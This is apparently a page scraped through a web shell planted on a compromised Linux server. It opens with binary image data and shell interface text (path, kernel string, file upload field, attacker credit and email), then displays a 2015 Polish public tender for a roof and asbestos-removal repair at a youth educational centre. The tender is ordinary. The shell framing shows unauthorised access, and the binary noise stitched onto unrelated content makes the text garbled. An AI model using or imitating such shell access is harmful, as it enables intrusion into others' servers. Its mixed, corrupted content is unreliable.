JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150803/115253-N-2015.html

<p class="kh_header"><b>Koźmin Wielkopolski: Remont dachu budynku szkoły Młodzieżowego Ośrodka Wychowawczego w Koźminie Wlkp.</b><br>
<b>Numer ogłoszenia: 115253 - 2015; data zamieszczenia: 03.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Młodzieżowy Ośrodek Wychowawczy , ul. Klasztorna 39, 63-720 Koźmin Wielkopolski, woj. wielkopolskie, tel. 0-62 7216542, faks 0-62 7216544.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Oświata.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dachu budynku szkoły Młodzieżowego Ośrodka Wychowawczego w Koźminie Wlkp..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 Remont dachu budynku szkoły Młodzieżowego Ośrodka Wychowawczego w Koźminie Wlkp.
Opis przedmiotu zamówienia

1)	Przedmiotem zamówienia jest  remont dachu budynku szkoły Młodzieżowego Ośrodka Wychowawczego w Koźminie Wlkp.

2)	Przedmiotowy obiekt położony jest w Koźminie Wlkp. przy ul. Klasztornej 39 
Zabytkowy budynek (wpisany do zabytkowego układu urbanistycznego pod Nr 776 WLKP/2010) wolnostojący o charakterze rezydencjonalnym zlokalizowany przy ul. Klasztornej w Koźminie Wielkopolskim przy zespole klasztornym wpisanym do rejestru zabytków pod numerem KI-IV-885/36/60 z dnia 06.06.1960 r. 
Budynek posiada dwie kondygnacje, jest podpiwniczony i został wzniesiony na bazie prostokąta z nieznacznie wystającą lukarną frontową. Dach dwuspadowy na bazie prostokąta obecnie kryty eternitem oraz blachą stalową ocynk., a na lukarnach zachodnich kryty dachówką - w miejscach wymagający doraźnie naprawy. Budynek szczytem południowym skierowany jest w stronę zespołu klasztornego p.w. Św. Biskupa Męczennika. Na dziedziniec i boisko prowadzi wjazd od strony wschodniej (przez bramę). Planowana inwestycja nie ingeruje w bryłę budynku i zachowuje wygląd jego elewacji. Inwestycja ma na celu zahamowanie postępującej degradacji substancji budowlanej oraz wymianę pokrycia dachowego na materiał nieszkodliwy dla zdrowia i środowiska oraz w miarę możliwości odtworzenie pierwotnego wyglądu obiektu.
3)	Zakres prac polegający na remoncie i przebudowie więźby dachowej obejmuje tylko dwupiętrowe poddasze  budynku z piętrem dolnym użytkowym w części którego znajdują się lukarny oraz górnym nieużytkowym i nie zmienia dotychczasowego sposobu użytkowania obiektu. Nie zmienia także zagospodarowania terenu. Inwestycja  ma na celu  przywrócenie budynkowi szczelności i zapobieżenie dalszej degradacji  elementów dachu.
4)	Na remont składają się  następujące  roboty budowlane:
a)	rozbiórka pokrycia dachu i poszycia oraz zużytych podłóg drewnianych nad II piętrem
b)	remont konstrukcji i pokrycia lukarn
c)	wymiana zaznaczonych na rysunku  krokwi oraz niezbędnych  elementów konstrukcyjnych  wstępnie ujętych w projekcie -  koniecznych do zweryfikowania po całkowitej ich odkrywce
d)	oczyszczenie, konserwacja  konstrukcji drewnianej dachu
e)	rozbiórka i przemurowanie części kominów
f)	wykonanie impregnacji konstrukcji drewnianej środkami  ognio- i grzybobójczymi
g)	montaż foli paroprzepuszczalnej
h)	wykonanie włazów dachowych  w rejonie kominów
i)	montaż dachówki 
j)	montaż opierzeń i orynnowania z blachy tytan-cynk
k)	montaż części  podłogi z desek drewnianych
5)	Powierzchnia całkowita  i wysokość kondygnacji poddasza, określona na podstawie inwentaryzacji 
a)	poddasze nieużytkowe (strych)    ok. 154,05 m2 /hmax = 2,84 m
b)	poddasze użytkowe		  ok. 300,20 m2/hmax=2,87 m
c)	powierzchnia zabudowy 		        300,20 m2
d)	max szerokość elewacji frontowej        23,70 m
e)	max szerokość elewacji bocznej            17,40 m

6)	Szczegółowy opis przedmiotu zamówienia określają: Dokumentacja projektowa stanowiąca Załącznik nr 1a  do niniejszej SIWZ  STWiOR- stanowiąca Załącznik nr 1b do niniejszej SIWZ Przedmiar robót - stanowiące Załącznik Nr 1 c do  niniejszej SIWZ

7)	Wykonawca w ramach przedmiotu zamówienia zobowiązany jest  do: wykonania  wszelkich robót przygotowawczych, porządkowych (zagospodarowania placu budowy, utrzymania zaplecza budowy, uprzątnięcia placu budowy i przywrócenia do stanu zastanego)  oraz wszelkich innych czynności niezbędnych do prawidłowego wykonania przedmiotu zamówienia i użytkowania przez Zamawiającego.

8)	W związku z tym, iż remontowany obiekt znajduje się na terenie  placówki oświatowej,   podczas wykonywania prac Wykonawca winien zapewnić szczególne bezpieczeństwo   wychowankom i pracownikom Młodzieżowego Ośrodka Wychowawczego w Koźminie  Wlkp. Zabezpieczenie terenu winno być przeprowadzone w sposób określony w    Specyfikacji  technicznej wykonania i odbioru robót.

9)	Z uwagi na specyfikę ośrodka (ośrodek zamknięty) prace należy zorganizować w taki  sposób aby  wykluczyć  ewentualne, nieuzasadnione oddalenie się  wychowanka.  
 
10)	  Roboty muszą być wykonane zgodnie z przepisami prawa, z  obowiązującymi Polskimi Normami i zasadami wiedzy technicznej, dokumentacją projektową, zapisami SIWZ oraz poleceniami inspektora ze strony Zamawiającego. Przedmiot zamówienia winien być wykonany  z należytą  starannością, w dobrej jakości. Wykonawca winien zapewnić   właściwą organizację  pracy z zachowaniem wymagań, przepisów prawa  i   przepisów bhp i     ppoż.

11)	 Materiały użyte do realizacji przedmiotu zamówienia powinny być fabrycznie nowe i  pochodzić z bieżącej produkcji. Użyte materiały oraz urządzenia muszą mieć aktualne dokumenty, dopuszczające do stosowania w budownictwie, wymagane Prawem  budowlanym. Dla materiałów, dla których zgodnie  z obowiązującym prawem nie są    wymagane aprobaty techniczne, certyfikaty lub deklaracje zgodności wyrobu ze stosowną aprobatą lub odpowiednią Polską Normą dopuszcza się przedstawienie rekomendacji technicznej ITB dopuszczającej stosowanie ww. materiałów w   budownictwie.
Zabrania się stosowania materiałów nieodpowiadających wymaganiom Polskiej Normy i PN EN oraz o innych parametrach niż określone w projekcie

12)	Jeżeli w opisie przedmiotu zmówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie wskazaniu temu towarzyszą wyrazy lub równoważne , co oznacza, że dopuszcza się  rozwiązania nie gorsze niż opisane, spełniające wymagania techniczne, funkcjonalne, eksploatacyjne, jakościowe, co najmniej takie jak wskazane w opisie przedmiotu zamówienia Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych parametrach technicznych, funkcjonalnych, eksploatacyjnych i jakościowych, nie gorszych niż przyjęte w dokumentacji. Materiały muszą być    dopuszczone do obrotu i stosowania  w  budownictwie określonym w art. 10 ustawy    z  dnia 7 lipca 1994 roku Prawo budowlane

13)	Wymagany minimalny okres gwarancji na wykonane roboty (materiały i robociznę) wynosi 36 miesięcy od daty bezusterkowego odbioru końcowego. 
Jednym z kryteriów oceny ofert jest  okres na jaki  Wykonawca wydłuży gwarancję.  Dokładny okres gwarancji określony zostanie po wyborze oferty przedstawiającej najkorzystniejszy bilans kryteriów oceny ofert tj. ceny oraz wydłużenie gwarancji

14)	Wraz ze zgłoszeniem zakończenia robót,  Wykonawca złoży w formie trwale spiętej wszelkie dokumenty związane z wykonanym przedmiotem zamówienia m.in.:dokumenty gwarancyjne, dokumenty potwierdzające jakość materiałów i urządzeń użytych do wykonania przedmiotu zamówienia, inne dokumenty zgromadzone w trakcie wykonywania przedmiotu zamówienia, a odnoszące się do jego realizacji, zwłaszcza rysunki ze zmianami naniesionymi w trakcie realizacji zadania,

15)	Wykonawca ponosi pełną odpowiedzialność za ewentualne szkody wyrządzone przez jego   działania lub zaniechania i zobowiązany jest do ich naprawy na własny koszt.

16)	Wykonawca jest odpowiedzialny za jakość wykonanych robót, bezpieczeństwo wszelkich czynności na terenie budowy, metody użyte przy budowie oraz za ich zgodność ze STWiOR i poleceniami Inspektora nadzoru.

17)	Prace  obejmujące realizację przedmiotu zamówienia  winny być prowadzone w sposób jak najmniej uciążliwy dla otoczenia z uwzględnieniem godzin ciszy nocnej.

18)	Zamawiający dopuszcza częściowy odbiór prac oraz częściowe  fakturowanie wykonanych prac. Podstawę do wystawienia faktury stanowi  pozytywny protokół częściowego lub końcowego odbioru prac potwierdzony przez upoważnionego przedstawiciela stron (inspektora nadzoru, kierownika budowy).

19)	 Wykonawca zobowiązany jest posiadać odpowiednie uprawnienia  w zakresie gospodarki odpadami tj: aktualne zezwolenie, pozwolenie lub decyzję zatwierdzającą program gospodarki odpadami niebezpiecznymi wydane przez właściwego Starostę lub Marszałka Województwa,

20)	Wybrany wykonawca musi zapewnić transport odpadów niebezpiecznych  zawierających azbest przez jednostki posiadające stosowne, aktualne zezwolenia w tym zakresie.
Wybrany wykonawca musi zapewnić  deponowanie odpadów niebezpiecznych zawierających azbest  na legalnym (posiadającym stosowne, aktualne zezwolenia) składowisku uprawnionym  do przyjęcia odpadów zawierających azbest.
 Udokumentowanie utylizacji nastąpi na podstawie karty przekazania odpadów  na legalne składowisko uprawnione do przyjęcia odpadów zawierających azbest (dokumenty te będą załącznikiem do końcowego protokołu odbioru prac)

2.3.  Przedmiot zamówienia należy wykonać zgodnie z obowiązującymi przepisami prawa, a w     szczególności zgodnie z:
a)	ustawą z dnia 7 lipca 1994 r. Prawo budowlane (j.t.Dz.U.2013.1409 z późn. zm.)
b)	ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21, z późn. zm.)
c)	ustawą  z dnia 19 czerwca 1997 r. o zakazie stosowania wyrobów zawierających azbest j.t. Dz. U. z 2004 r. Nr 3, poz. 20 z późn. zm.)
d)	rozporządzeniem Ministra Gospodarki i Pracy z dnia 14 października 2005 r. w sprawie zasad bezpieczeństwa i higieny pracy przy zabezpieczaniu i usuwaniu wyrobów zawierających azbest oraz programu szkolenia w zakresie bezpiecznego użytkowania takich wyrobów (Dz.U. Nr 216, poz. 1824)
e)	rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej  z dnia 2 kwietnia 2004 r.  w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz.U. Nr 71, poz. 649 z późn. zm.)
f)	 rozporządzeniem Ministra Gospodarki z dnia 13 grudnia 2010 r. w sprawie wymagań w zakresie wykorzystywania wyrobów zawierających azbest oraz wykorzystywania i oczyszczania instalacji lub urządzeń, w których były lub są wykorzystywane wyroby zawierające azbest  (Dz. U. z 2011 r. Nr 8, poz. 31 z późn. zm.)
g)	ustawą z dnia 19 sierpnia 2011 r. o przewozie towarów niebezpiecznych (Dz.U. 2011 Nr 227 poz. 1367)
h)	ustawą z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (j.t. Dz.U.2014.1446 z późn. zm.)
2.4. Wykonawca na potrzeby ochrony powietrza przed zanieczyszczeniem jest zobowiązany do         używania środków transportu spełniających odpowiednie normy emisji spalin oraz         prowadzenia prac budowlanych w sposób ograniczający niezorganizowaną emisję pyłu do         powietrza. Ponadto Wykonawca jest zobowiązany do użytkowania farb i lakierów         ekologicznych o małej zawartości NMLZO (niemetanowe lotne związki organiczne).

2.5. Najpóźniej w dniu zawarcia umowy, wykonawca, którego oferta zostanie wybrana jako  najkorzystniejsza, dostarczy zamawiającemu podpisany egzemplarz    kosztorysu    ofertowego  uwzględniający zakres prac zgodny z     dokumentacją           projektową, STWiOR  na ogólną wartość  jak w  złożonej ofercie. 
Żądanie dostarczenia  kosztorysu ofertowego,  wynika z faktu  współfinansowania przedmiotu zamówienia  ze środków przeznaczonych na ochronę środowiska,  w części dotyczącej usuwania i utylizacji azbestu.  

2.6.  Istnieje możliwość dokonania wizji lokalnej obiektu po uzgodnieniu telefonicznym -   Karolina Baranek tel. 62 721 65 42

2.7. Podwykonawstwo
1)	Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę  kluczowych części    zamówienia.
2)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczyła będzie podmiotu, na którego zasoby wykonawca powoływał się , na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu określonych w SIWZ, wykonawca zobowiązany będzie wykazać zamawiającemu, iż proponowany inny wykonawca lub wykonawca  samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia
3)	Zamawiający we wzorze umowy określił  wymagania dotyczące  umowy o podwykonawstwo, której przedmiotem są roboty budowlane, których niespełnienie spowoduje  zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub sprzeciwu
4)	Zamawiający  we wzorze umowy  określił informacje o umowach o podwykonawstwo, których  przedmiotem są dostawy lub usługi, które podlegają obowiązkowi przedkładania zamawiającemu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4, 45.26.11.00-5, 45.26.21.00-2, 45.26.12.00-6, 45.26.26.90-4, 45.26.19.00-3, 90.65.00.00-8, 45.26.26.60-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie  na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Wydłużenie gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy:
1)	Obniżenie wynagrodzenia - W przypadkach określonych  w § 5 ust. 1 i 2  umowy,  tj. w przypadku  zmniejszenia  zakresu robót,  wykonania robót zamiennych.  
2)	Dopuszcza się zmianę osoby (kierownika budowy)  przeznaczonej do realizacji zamówienia  przez Wykonawcę. W takim przypadku, Wykonawca do realizacji przedmiotu zamówienia zapewnia  osoby posiadające  odpowiednie   kwalifikacje, 
3)	Dopuszcza się zmianę inspektora nadzoru.
4)	Zmianę podwykonawców i dalszych podwykonawców, na zasoby których Wykonawca powoływał się przy wykazywaniu  spełniania warunków udziału w postępowaniu.  Zamawiający dopuszcza możliwość zmiany podwykonawców i dalszych  podwykonawców, pod warunkiem wykazania zamawiającemu, iż proponowany inny wykonawca lub wykonawca  samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia
5)	Przedłużenia terminu  wykonania przedmiotu zamówienia  z przyczyn nie wynikających   ze zwłoki Wykonawcy w  szczególności:
a)	 razie zaistnienia  zdarzeń o charakterze działania siły wyższej, przez która strony rozumieją m.in. klęski żywiołowe, stan wyjątkowy, działania terrorystyczne,  strajk, inne zdarzenia mające charakter siły wyższej; o czas trwania siły wyższej
b)	 w razie udzielenia zamówienia dodatkowego, zgodnie z  art. 67  ust. 1 pkt. 5 ustawy Prawo zamówień publicznych, o okres wykonywania zamówienia dodatkowego.
c)	gdy wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które  Wykonawca ponosi odpowiedzialność.
d)	wystąpienia warunków hydrologicznych odbiegających w sposób istotny od przyjętych norm 
e)	wystąpienia znalezisk archeologicznych, występowania  niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń nieterminowym wykonaniem prac.
2)	Przedłużenia terminu  wykonania przedmiotu zamówienia  z powodu wystąpienia okoliczności, za które odpowiada Zamawiający, w szczególności,  które będą  następstwem nieterminowego przekazania placu budowy, konieczności dokonania zmian w dokumentacji projektowej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mowkozmin.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.mowkozmin.pl/
lub
Młodzieżowy Ośrodek Wychowawczy
ul. Klasztorna 39
63-720 Koźmin Wlkp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2015 godzina 13:00, miejsce: Młodzieżowy Ośrodek Wychowawczy
ul. Klasztorna 39
63-720 Koźmin Wlkp.
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com